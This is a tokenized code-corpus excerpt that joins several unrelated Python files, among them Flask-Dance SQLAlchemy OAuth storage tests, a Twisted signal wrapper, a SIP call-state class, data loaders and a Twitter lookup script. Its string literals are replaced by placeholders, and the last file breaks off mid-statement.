. relationship ( User ) <EOL> blueprint . backend = SQLAlchemyBackend ( OAuth , db . session , user = current_user ) <EOL> db . create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> u1 = User ( name = "<STR_LIT>" ) <EOL> u2 = User ( name = "<STR_LIT>" ) <EOL> u3 = User ( name = "<STR_LIT>" ) <EOL> db . session . add_all ( [ u1 , u2 , u3 ] ) <EOL> db . session . commit ( ) <EOL> @ login_manager . user_loader <EOL> def load_user ( userid ) : <EOL> return User . query . get ( userid ) <EOL> with record_queries ( db . engine ) as queries : <EOL> with app . test_client ( ) as client : <EOL> with client . session_transaction ( ) as sess : <EOL> sess [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> sess [ "<STR_LIT>" ] = u1 . id <EOL> resp = client . get ( <EOL> "<STR_LIT>" , <EOL> base_url = "<STR_LIT>" , <EOL> ) <EOL> assert resp . 
status_code == <NUM_LIT> <EOL> assert resp . headers [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert len ( queries ) == <NUM_LIT:4> <EOL> responses . reset ( ) <EOL> responses . add ( <EOL> responses . POST , <EOL> "<STR_LIT>" , <EOL> body = '<STR_LIT>' , <EOL> ) <EOL> with record_queries ( db . engine ) as queries : <EOL> with app . test_client ( ) as client : <EOL> with client . session_transaction ( ) as sess : <EOL> sess [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> sess [ "<STR_LIT>" ] = u2 . id <EOL> resp = client . get ( <EOL> "<STR_LIT>" , <EOL> base_url = "<STR_LIT>" , <EOL> ) <EOL> assert resp . status_code == <NUM_LIT> <EOL> assert resp . headers [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert len ( queries ) == <NUM_LIT:4> <EOL> authorizations = OAuth . query . all ( ) <EOL> assert len ( authorizations ) == <NUM_LIT:2> <EOL> u1_oauth = OAuth . query . filter_by ( user = u1 ) . one ( ) <EOL> assert u1_oauth . provider == "<STR_LIT>" <EOL> assert u1_oauth . token == { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } <EOL> u2_oauth = OAuth . query . filter_by ( user = u2 ) . one ( ) <EOL> assert u2_oauth . provider == "<STR_LIT>" <EOL> assert u2_oauth . token == { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } <EOL> u3_oauth = OAuth . query . filter_by ( user = u3 ) . all ( ) <EOL> assert len ( u3_oauth ) == <NUM_LIT:0> <EOL> @ requires_blinker <EOL> def test_sqla_flask_login_anon_to_authed ( app , db , blueprint , request ) : <EOL> login_manager = LoginManager ( app ) <EOL> class User ( db . Model , UserMixin ) : <EOL> id = db . Column ( db . Integer , primary_key = True ) <EOL> name = db . Column ( db . String ( <NUM_LIT> ) ) <EOL> class OAuth ( db . Model , OAuthConsumerMixin ) : <EOL> user_id = db . Column ( db . Integer , db . ForeignKey ( User . id ) ) <EOL> user = db . relationship ( User ) <EOL> blueprint . 
backend = SQLAlchemyBackend ( OAuth , db . session , user = current_user ) <EOL> db . create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> @ login_manager . user_loader <EOL> def load_user ( userid ) : <EOL> return User . query . get ( userid ) <EOL> def logged_in ( sender , token ) : <EOL> assert token <EOL> assert blueprint == sender <EOL> resp = sender . session . get ( "<STR_LIT>" ) <EOL> user = User ( name = resp . json ( ) [ "<STR_LIT:name>" ] ) <EOL> login_user ( user ) <EOL> db . session . add ( user ) <EOL> db . session . commit ( ) <EOL> flask . flash ( "<STR_LIT>" ) <EOL> oauth_authorized . connect ( logged_in , blueprint ) <EOL> request . addfinalizer ( lambda : oauth_authorized . disconnect ( logged_in , blueprint ) ) <EOL> responses . add ( <EOL> responses . GET , <EOL> "<STR_LIT>" , <EOL> body = '<STR_LIT>' , <EOL> ) <EOL> with record_queries ( db . engine ) as queries : <EOL> with app . test_client ( ) as client : <EOL> with client . session_transaction ( ) as sess : <EOL> sess [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> resp = client . get ( <EOL> "<STR_LIT>" , <EOL> base_url = "<STR_LIT>" , <EOL> ) <EOL> assert resp . status_code == <NUM_LIT> <EOL> assert resp . headers [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert len ( queries ) == <NUM_LIT:5> <EOL> users = User . query . all ( ) <EOL> assert len ( users ) == <NUM_LIT:1> <EOL> user = users [ <NUM_LIT:0> ] <EOL> assert user . name == "<STR_LIT>" <EOL> authorizations = OAuth . query . all ( ) <EOL> assert len ( authorizations ) == <NUM_LIT:1> <EOL> oauth = authorizations [ <NUM_LIT:0> ] <EOL> assert oauth . provider == "<STR_LIT>" <EOL> assert oauth . token == { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } <EOL> assert oauth . user_id == user . id <EOL> def test_sqla_flask_login_preload_logged_in_user ( app , db , blueprint , request ) : <EOL> responses . 
add ( <EOL> responses . GET , <EOL> "<STR_LIT>" , <EOL> ) <EOL> login_manager = LoginManager ( app ) <EOL> class User ( db . Model , UserMixin ) : <EOL> id = db . Column ( db . Integer , primary_key = True ) <EOL> name = db . Column ( db . String ( <NUM_LIT> ) ) <EOL> class OAuth ( db . Model , OAuthConsumerMixin ) : <EOL> user_id = db . Column ( db . Integer , db . ForeignKey ( User . id ) ) <EOL> user = db . relationship ( User ) <EOL> blueprint . backend = SQLAlchemyBackend ( OAuth , db . session , user = current_user ) <EOL> db . create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> alice = User ( name = "<STR_LIT>" ) <EOL> alice_token = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> alice_oauth = OAuth ( user = alice , token = alice_token , provider = "<STR_LIT>" ) <EOL> bob = User ( name = "<STR_LIT>" ) <EOL> bob_token = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> bob_oauth = OAuth ( user = bob , token = bob_token , provider = "<STR_LIT>" ) <EOL> chuck = User ( name = "<STR_LIT>" ) <EOL> db . session . add_all ( [ alice , alice_oauth , bob , bob_oauth , chuck ] ) <EOL> db . session . commit ( ) <EOL> @ login_manager . user_loader <EOL> def load_user ( userid ) : <EOL> return User . query . get ( userid ) <EOL> @ app . route ( "<STR_LIT:/>" ) <EOL> def index ( ) : <EOL> return "<STR_LIT:success>" <EOL> with app . test_request_context ( "<STR_LIT:/>" ) : <EOL> login_user ( alice ) <EOL> blueprint . session . get ( "<STR_LIT>" ) <EOL> assert blueprint . session . token == alice_token <EOL> with app . test_request_context ( "<STR_LIT:/>" ) : <EOL> login_user ( bob ) <EOL> blueprint . session . get ( "<STR_LIT>" ) <EOL> assert blueprint . session . token == bob_token <EOL> with app . test_request_context ( "<STR_LIT:/>" ) : <EOL> login_user ( chuck ) <EOL> blueprint . session . get ( "<STR_LIT>" ) <EOL> assert blueprint . session . 
token == None <EOL> with app . test_request_context ( "<STR_LIT:/>" ) : <EOL> logout_user ( ) <EOL> blueprint . session . get ( "<STR_LIT>" ) <EOL> assert blueprint . session . token == None <EOL> def test_sqla_delete_token ( app , db , blueprint , request ) : <EOL> class OAuth ( db . Model , OAuthConsumerMixin ) : <EOL> pass <EOL> blueprint . backend = SQLAlchemyBackend ( OAuth , db . session ) <EOL> db . create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> existing = OAuth ( <EOL> provider = "<STR_LIT>" , <EOL> token = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } , <EOL> ) <EOL> db . session . add ( existing ) <EOL> db . session . commit ( ) <EOL> assert len ( OAuth . query . all ( ) ) == <NUM_LIT:1> <EOL> assert blueprint . token == { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } <EOL> del blueprint . token <EOL> assert blueprint . token == None <EOL> assert len ( OAuth . query . all ( ) ) == <NUM_LIT:0> <EOL> def test_sqla_overwrite_token ( app , db , blueprint , request ) : <EOL> class OAuth ( db . Model , OAuthConsumerMixin ) : <EOL> pass <EOL> blueprint . backend = SQLAlchemyBackend ( OAuth , db . session ) <EOL> db . create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> existing = OAuth ( <EOL> provider = "<STR_LIT>" , <EOL> token = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } , <EOL> ) <EOL> db . session . add ( existing ) <EOL> db . session . commit ( ) <EOL> assert len ( OAuth . query . all ( ) ) == <NUM_LIT:1> <EOL> with record_queries ( db . engine ) as queries : <EOL> with app . test_client ( ) as client : <EOL> with client . 
session_transaction ( ) as sess : <EOL> sess [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> resp = client . get ( <EOL> "<STR_LIT>" , <EOL> base_url = "<STR_LIT>" , <EOL> ) <EOL> assert resp . status_code == <NUM_LIT> <EOL> assert resp . headers [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert len ( queries ) == <NUM_LIT:2> <EOL> authorizations = OAuth . query . all ( ) <EOL> assert len ( authorizations ) == <NUM_LIT:1> <EOL> oauth = authorizations [ <NUM_LIT:0> ] <EOL> assert oauth . provider == "<STR_LIT>" <EOL> assert isinstance ( oauth . token , dict ) <EOL> assert oauth . token == { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } <EOL> def test_sqla_cache ( app , db , blueprint , request ) : <EOL> cache = Cache ( app ) <EOL> class OAuth ( db . Model , OAuthConsumerMixin ) : <EOL> pass <EOL> blueprint . backend = SQLAlchemyBackend ( OAuth , db . session , cache = cache ) <EOL> db . create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> with record_queries ( db . engine ) as queries : <EOL> with app . test_client ( ) as client : <EOL> with client . session_transaction ( ) as sess : <EOL> sess [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> resp = client . get ( <EOL> "<STR_LIT>" , <EOL> base_url = "<STR_LIT>" , <EOL> ) <EOL> assert resp . status_code == <NUM_LIT> <EOL> assert resp . headers [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert len ( queries ) == <NUM_LIT:2> <EOL> expected_token = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } <EOL> authorizations = OAuth . query . all ( ) <EOL> assert len ( authorizations ) == <NUM_LIT:1> <EOL> oauth = authorizations [ <NUM_LIT:0> ] <EOL> assert oauth . provider == "<STR_LIT>" <EOL> assert isinstance ( oauth . token , dict ) <EOL> assert oauth . token == expected_token <EOL> assert cache . 
get ( "<STR_LIT>" ) is None <EOL> with record_queries ( db . engine ) as queries : <EOL> assert blueprint . token == expected_token <EOL> assert len ( queries ) == <NUM_LIT:1> <EOL> assert cache . get ( "<STR_LIT>" ) == expected_token <EOL> with record_queries ( db . engine ) as queries : <EOL> assert blueprint . token == expected_token <EOL> assert len ( queries ) == <NUM_LIT:0> </s>
<s> from setuptools import setup , find_packages <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = "<STR_LIT>" , <EOL> packages = find_packages ( ) , <EOL> install_requires = [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> package_data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> } , <EOL> test_suite = '<STR_LIT>' , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } , <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> license = "<STR_LIT>" , <EOL> keywords = "<STR_LIT>" , <EOL> url = "<STR_LIT>" , <EOL> ) </s>
<s> from signal import signal , SIG_IGN , SIG_DFL <EOL> from twisted . internet import reactor <EOL> from datetime import datetime <EOL> from traceback import print_exc <EOL> from sys import stdout <EOL> class Signal ( object ) : <EOL> callback = None <EOL> parameters = None <EOL> previous_handler = None <EOL> def __init__ ( self , signum , callback , * parameters ) : <EOL> self . signum = signum <EOL> self . callback = callback <EOL> self . parameters = parameters <EOL> self . previous_handler = signal ( signum , self . signal_handler ) <EOL> def signal_handler ( self , signum , * frame ) : <EOL> reactor . callFromThread ( self . dispatch ) <EOL> if self . previous_handler not in ( SIG_IGN , SIG_DFL ) : <EOL> try : <EOL> self . previous_handler ( signum , * frame ) <EOL> except : <EOL> print datetime . now ( ) , '<STR_LIT>' <EOL> print '<STR_LIT:->' * <NUM_LIT> <EOL> print_exc ( file = stdout ) <EOL> print '<STR_LIT:->' * <NUM_LIT> <EOL> stdout . flush ( ) <EOL> def dispatch ( self ) : <EOL> try : <EOL> self . callback ( * self . parameters ) <EOL> except : <EOL> print datetime . now ( ) , '<STR_LIT>' <EOL> print '<STR_LIT:->' * <NUM_LIT> <EOL> print_exc ( file = stdout ) <EOL> print '<STR_LIT:->' * <NUM_LIT> <EOL> stdout . flush ( ) <EOL> def cancel ( self ) : <EOL> signal ( self . signum , self . previous_handler ) <EOL> self . callback = None <EOL> self . parameters = None <EOL> self . previous_handler = None <EOL> def log_signal ( signum , sip_logger , signal_cb , cb_params ) : <EOL> sip_logger . write ( '<STR_LIT>' % ( signum , str ( signal_cb ) ) ) <EOL> return signal_cb ( * cb_params ) <EOL> def LogSignal ( sip_logger , signum , signal_cb , * cb_params ) : <EOL> sip_logger . 
write ( '<STR_LIT>' % ( signum , str ( signal_cb ) ) ) <EOL> return Signal ( signum , log_signal , signum , sip_logger , signal_cb , cb_params ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from signal import SIGHUP , SIGURG , SIGTERM <EOL> from os import kill , getpid <EOL> def test ( arguments ) : <EOL> arguments [ '<STR_LIT:test>' ] = not arguments [ '<STR_LIT:test>' ] <EOL> reactor . crash ( ) <EOL> arguments = { '<STR_LIT:test>' : False } <EOL> s = Signal ( SIGURG , test , arguments ) <EOL> kill ( getpid ( ) , SIGURG ) <EOL> reactor . run ( ) <EOL> assert ( arguments [ '<STR_LIT:test>' ] ) <EOL> s . cancel ( ) <EOL> Signal ( SIGHUP , test , arguments ) <EOL> kill ( getpid ( ) , SIGURG ) <EOL> kill ( getpid ( ) , SIGHUP ) <EOL> reactor . run ( ) <EOL> assert ( not arguments [ '<STR_LIT:test>' ] ) <EOL> from SipLogger import SipLogger <EOL> sip_logger = SipLogger ( '<STR_LIT>' ) <EOL> LogSignal ( sip_logger , SIGTERM , test , arguments ) <EOL> kill ( getpid ( ) , SIGTERM ) <EOL> reactor . run ( ) <EOL> assert ( arguments [ '<STR_LIT:test>' ] ) </s>
<s> from SipFrom import SipFrom <EOL> class SipRecordRoute ( SipFrom ) : <EOL> hf_names = ( '<STR_LIT>' , ) <EOL> relaxedparser = False <EOL> def getCanName ( self , name , compact = False ) : <EOL> if name == '<STR_LIT>' : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> def getAddr ( self ) : <EOL> return self . address . url . getAddr ( ) </s>
<s> from SipAddress import SipAddress <EOL> from SipRoute import SipRoute <EOL> from UaStateGeneric import UaStateGeneric <EOL> from CCEvents import CCEventRing , CCEventConnect , CCEventFail , CCEventRedirect , CCEventDisconnect , CCEventPreConnect <EOL> class UacStateRinging ( UaStateGeneric ) : <EOL> sname = '<STR_LIT>' <EOL> triedauth = False <EOL> def recvResponse ( self , resp , tr ) : <EOL> body = resp . getBody ( ) <EOL> code , reason = resp . getSCode ( ) <EOL> scode = ( code , reason , body ) <EOL> if code < <NUM_LIT:200> : <EOL> if self . ua . p1xx_ts == None : <EOL> self . ua . p1xx_ts = resp . rtime <EOL> self . ua . last_scode = code <EOL> event = CCEventRing ( scode , rtime = resp . rtime , origin = self . ua . origin ) <EOL> for ring_cb in self . ua . ring_cbs : <EOL> ring_cb ( self . ua , resp . rtime , self . ua . origin , code ) <EOL> if body != None : <EOL> if self . ua . on_remote_sdp_change != None : <EOL> self . ua . on_remote_sdp_change ( body , lambda x : self . ua . delayed_remote_sdp_update ( event , x ) ) <EOL> return None <EOL> else : <EOL> self . ua . rSDP = body . getCopy ( ) <EOL> else : <EOL> self . ua . rSDP = None <EOL> self . ua . equeue . append ( event ) <EOL> return None <EOL> if self . ua . expire_timer != None : <EOL> self . ua . expire_timer . cancel ( ) <EOL> self . ua . expire_timer = None <EOL> if code >= <NUM_LIT:200> and code < <NUM_LIT> : <EOL> if resp . countHFs ( '<STR_LIT>' ) > <NUM_LIT:0> : <EOL> self . ua . rTarget = resp . getHFBody ( '<STR_LIT>' ) . getUrl ( ) . getCopy ( ) <EOL> self . ua . routes = [ x . getCopy ( ) for x in resp . getHFBodys ( '<STR_LIT>' ) ] <EOL> self . ua . routes . reverse ( ) <EOL> if len ( self . ua . routes ) > <NUM_LIT:0> : <EOL> if not self . ua . routes [ <NUM_LIT:0> ] . getUrl ( ) . lr : <EOL> self . ua . routes . append ( SipRoute ( address = SipAddress ( url = self . ua . rTarget ) ) ) <EOL> self . ua . rTarget = self . ua . routes . pop ( <NUM_LIT:0> ) . getUrl ( ) <EOL> self . 
ua . rAddr = self . ua . rTarget . getAddr ( ) <EOL> elif self . ua . outbound_proxy != None : <EOL> self . ua . routes . append ( SipRoute ( address = SipAddress ( url = self . ua . rTarget ) ) ) <EOL> self . ua . rTarget = self . ua . routes [ <NUM_LIT:0> ] . getUrl ( ) . getCopy ( ) <EOL> self . ua . rTarget . lr = False <EOL> self . ua . rTarget . other = tuple ( ) <EOL> self . ua . rTarget . headers = tuple ( ) <EOL> else : <EOL> self . ua . rAddr = self . ua . routes [ <NUM_LIT:0> ] . getAddr ( ) <EOL> else : <EOL> self . ua . rAddr = self . ua . rTarget . getAddr ( ) <EOL> tag = resp . getHFBody ( '<STR_LIT:to>' ) . getTag ( ) <EOL> if tag == None : <EOL> print '<STR_LIT>' <EOL> scode = ( <NUM_LIT> , '<STR_LIT>' ) <EOL> self . ua . equeue . append ( CCEventFail ( scode , rtime = resp . rtime , origin = self . ua . origin ) ) <EOL> if resp . countHFs ( '<STR_LIT>' ) > <NUM_LIT:0> : <EOL> self . ua . rTarget = resp . getHFBody ( '<STR_LIT>' ) . getUrl ( ) . getCopy ( ) <EOL> self . ua . routes = [ x . getCopy ( ) for x in resp . getHFBodys ( '<STR_LIT>' ) ] <EOL> self . ua . routes . reverse ( ) <EOL> if len ( self . ua . routes ) > <NUM_LIT:0> : <EOL> if not self . ua . routes [ <NUM_LIT:0> ] . getUrl ( ) . lr : <EOL> self . ua . routes . append ( SipRoute ( address = SipAddress ( url = self . ua . rTarget ) ) ) <EOL> self . ua . rTarget = self . ua . routes . pop ( <NUM_LIT:0> ) . getUrl ( ) <EOL> self . ua . rAddr = self . ua . rTarget . getAddr ( ) <EOL> elif self . ua . outbound_proxy != None : <EOL> self . ua . routes . append ( SipRoute ( address = SipAddress ( url = self . ua . rTarget ) ) ) <EOL> self . ua . rTarget = self . ua . routes [ <NUM_LIT:0> ] . getUrl ( ) . getCopy ( ) <EOL> self . ua . rTarget . lr = False <EOL> self . ua . rTarget . other = tuple ( ) <EOL> self . ua . rTarget . headers = tuple ( ) <EOL> else : <EOL> self . ua . rAddr = self . ua . routes [ <NUM_LIT:0> ] . getAddr ( ) <EOL> else : <EOL> self . ua . rAddr = self . ua . 
rTarget . getAddr ( ) <EOL> req = self . ua . genRequest ( '<STR_LIT>' ) <EOL> self . ua . lCSeq += <NUM_LIT:1> <EOL> self . ua . global_config [ '<STR_LIT>' ] . newTransaction ( req , laddress = self . ua . source_address , compact = self . ua . compact_sip ) <EOL> return ( UaStateFailed , self . ua . fail_cbs , resp . rtime , self . ua . origin , scode [ <NUM_LIT:0> ] ) <EOL> self . ua . rUri . setTag ( tag ) <EOL> if not self . ua . late_media or body == None : <EOL> self . ua . late_media = False <EOL> event = CCEventConnect ( scode , rtime = resp . rtime , origin = self . ua . origin ) <EOL> self . ua . startCreditTimer ( resp . rtime ) <EOL> self . ua . connect_ts = resp . rtime <EOL> rval = ( UaStateConnected , self . ua . conn_cbs , resp . rtime , self . ua . origin ) <EOL> else : <EOL> event = CCEventPreConnect ( scode , rtime = resp . rtime , origin = self . ua . origin ) <EOL> tr . uack = True <EOL> self . ua . pending_tr = tr <EOL> rval = ( UaStateConnected , ) <EOL> if body != None : <EOL> if self . ua . on_remote_sdp_change != None : <EOL> self . ua . on_remote_sdp_change ( body , lambda x : self . ua . delayed_remote_sdp_update ( event , x ) ) <EOL> return rval <EOL> else : <EOL> self . ua . rSDP = body . getCopy ( ) <EOL> else : <EOL> self . ua . rSDP = None <EOL> self . ua . equeue . append ( event ) <EOL> return rval <EOL> if code in ( <NUM_LIT> , <NUM_LIT> ) and resp . countHFs ( '<STR_LIT>' ) > <NUM_LIT:0> : <EOL> scode = ( code , reason , body , resp . getHFBody ( '<STR_LIT>' ) . getUrl ( ) . getCopy ( ) ) <EOL> self . ua . equeue . append ( CCEventRedirect ( scode , rtime = resp . rtime , origin = self . ua . origin ) ) <EOL> else : <EOL> event = CCEventFail ( scode , rtime = resp . rtime , origin = self . ua . origin ) <EOL> try : <EOL> event . reason = resp . getHFBody ( '<STR_LIT>' ) <EOL> except : <EOL> pass <EOL> self . ua . equeue . append ( event ) <EOL> self . ua . disconnect_ts = resp . rtime <EOL> return ( UaStateFailed , self . ua . 
fail_cbs , resp . rtime , self . ua . origin , code ) <EOL> def recvEvent ( self , event ) : <EOL> if isinstance ( event , CCEventFail ) or isinstance ( event , CCEventRedirect ) or isinstance ( event , CCEventDisconnect ) : <EOL> self . ua . global_config [ '<STR_LIT>' ] . cancelTransaction ( self . ua . tr , reason = event . reason ) <EOL> if self . ua . expire_timer != None : <EOL> self . ua . expire_timer . cancel ( ) <EOL> self . ua . expire_timer = None <EOL> self . ua . disconnect_ts = event . rtime <EOL> return ( UacStateCancelling , self . ua . disc_cbs , event . rtime , event . origin , self . ua . last_scode ) <EOL> return None <EOL> if not globals ( ) . has_key ( '<STR_LIT>' ) : <EOL> from UaStateFailed import UaStateFailed <EOL> if not globals ( ) . has_key ( '<STR_LIT>' ) : <EOL> from UaStateConnected import UaStateConnected <EOL> if not globals ( ) . has_key ( '<STR_LIT>' ) : <EOL> from UacStateCancelling import UacStateCancelling </s>
<s> import csv <EOL> import os <EOL> import json <EOL> import re <EOL> re_nonwords = re . compile ( r'<STR_LIT>' ) <EOL> def get_zipcodes ( ) : <EOL> dirname = os . path . dirname ( os . path . abspath ( __file__ ) ) <EOL> zips = { } <EOL> states = set ( ) <EOL> with file ( os . path . join ( dirname , '<STR_LIT>' ) , '<STR_LIT:r>' ) as f : <EOL> r = csv . reader ( f ) <EOL> for row in r : <EOL> data = { '<STR_LIT>' : row [ <NUM_LIT:5> ] , <EOL> '<STR_LIT>' : row [ <NUM_LIT:4> ] , <EOL> '<STR_LIT:state>' : row [ <NUM_LIT:2> ] . lower ( ) , <EOL> '<STR_LIT>' : row [ <NUM_LIT:3> ] . lower ( ) } <EOL> zips [ row [ <NUM_LIT:1> ] . lower ( ) ] = data <EOL> states . add ( row [ <NUM_LIT:2> ] . lower ( ) ) <EOL> return zips <EOL> def get_states ( ) : <EOL> dirname = os . path . dirname ( os . path . abspath ( __file__ ) ) <EOL> data = json . load ( file ( os . path . join ( dirname , '<STR_LIT>' ) , '<STR_LIT:r>' ) ) <EOL> ret = { } <EOL> for row in data : <EOL> name = row [ <NUM_LIT:0> ] <EOL> for v in row : <EOL> if v and not v . startswith ( "<STR_LIT:(>" ) : <EOL> v = re_nonwords . sub ( '<STR_LIT>' , v ) <EOL> if v : <EOL> ret [ v ] = name <EOL> return ret <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> print get_states ( ) . items ( ) [ : <NUM_LIT:2> ] <EOL> print get_zipcodes ( ) . items ( ) [ : <NUM_LIT:2> ] </s>
<s> import numpy as np <EOL> from replay_memory import ReplayMemoryHDF5 <EOL> settings = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : ( <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : <NUM_LIT:1000> , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT:20> ) , <EOL> '<STR_LIT>' : <NUM_LIT:32> <EOL> } <EOL> mem = ReplayMemoryHDF5 ( settings ) <EOL> o_dims = settings [ '<STR_LIT>' ] <EOL> for i in xrange ( <NUM_LIT:1000> ) : <EOL> obs = np . random . random ( o_dims ) + i <EOL> a = np . random . randint ( <NUM_LIT:10> ) + i <EOL> r = np . random . rand ( ) + i <EOL> obsp = np . random . random ( o_dims ) + i <EOL> term = bool ( np . random . binomial ( <NUM_LIT:1> , <NUM_LIT:0.1> ) ) <EOL> mem . store_tuple ( obs , a , r , obsp , term ) <EOL> o , a , r , op , terms = mem . minibatch ( ) </s>
<s> from . client import * <EOL> from . server import * </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import os , sys , time , calendar <EOL> from getopt import gnu_getopt as getopt , GetoptError <EOL> try : <EOL> import urllib . request as urllib2 <EOL> import http . client as httplib <EOL> except ImportError : <EOL> import urllib2 <EOL> import httplib <EOL> CONSUMER_KEY = '<STR_LIT>' <EOL> CONSUMER_SECRET = '<STR_LIT>' <EOL> from . api import Twitter , TwitterError <EOL> from . oauth import OAuth , read_token_file <EOL> from . oauth_dance import oauth_dance <EOL> from . auth import NoAuth <EOL> from . util import Fail , err <EOL> def parse_args ( args , options ) : <EOL> """<STR_LIT>""" <EOL> long_opts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> short_opts = "<STR_LIT>" <EOL> opts , extra_args = getopt ( args , short_opts , long_opts ) <EOL> for opt , arg in opts : <EOL> if opt in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> print ( __doc__ ) <EOL> raise SystemExit ( <NUM_LIT:1> ) <EOL> elif opt in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = True <EOL> elif opt in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = True <EOL> elif opt in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = False <EOL> elif opt in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = True <EOL> elif opt in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = True <EOL> options [ '<STR_LIT>' ] = extra_args <EOL> def lookup_portion ( twitter , user_ids ) : <EOL> """<STR_LIT>""" <EOL> users = { } <EOL> kwargs = dict ( user_id = "<STR_LIT:U+002C>" . join ( map ( str , user_ids ) ) , skip_status = <NUM_LIT:1> ) <EOL> for u in twitter . users . 
lookup ( ** kwargs ) : <EOL> users [ int ( u [ '<STR_LIT:id>' ] ) ] = u [ '<STR_LIT>' ] <EOL> return users <EOL> def lookup ( twitter , user_ids ) : <EOL> """<STR_LIT>""" <EOL> users = { } <EOL> api_limit = <NUM_LIT:100> <EOL> for i in range ( <NUM_LIT:0> , len ( user_ids ) , api_limit ) : <EOL> fail = Fail ( ) <EOL> while True : <EOL> try : <EOL> portion = lookup_portion ( twitter , user_ids [ i : ] [ : api_limit ] ) <EOL> except TwitterError as e : <EOL> if e . e . code == <NUM_LIT> : <EOL> err ( "<STR_LIT>" % e . e . code ) <EOL> rls = twitter . application . rate_limit_status ( ) <EOL> reset = rls . rate_limit_reset <EOL> reset = time . asctime ( time . localtime ( reset ) ) <EOL> delay = int ( rls . rate_limit_reset <EOL> - time . time ( ) ) + <NUM_LIT:5> <EOL> err ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( rls . rate_limit_limit , reset , delay ) ) <EOL> fail . wait ( delay ) <EOL> continue <EOL> elif e . e . code == <NUM_LIT> : <EOL> err ( "<STR_LIT>" <EOL> % e . e . code ) <EOL> else : <EOL> err ( "<STR_LIT>" % str ( e ) [ : <NUM_LIT> ] ) <EOL> fail . wait ( <NUM_LIT:3> ) <EOL> except urllib2 . URLError as e : <EOL> err ( "<STR_LIT>" % str ( e ) ) <EOL> fail . wait ( <NUM_LIT:3> ) <EOL> except httplib . error as e : <EOL> err ( "<STR_LIT>" % str ( e ) ) <EOL> fail . wait ( <NUM_LIT:3> ) <EOL> except KeyError as e : <EOL> err ( "<STR_LIT>" % str ( e ) ) <EOL> fail . wait ( <NUM_LIT:3> ) <EOL> else : <EOL> users . update 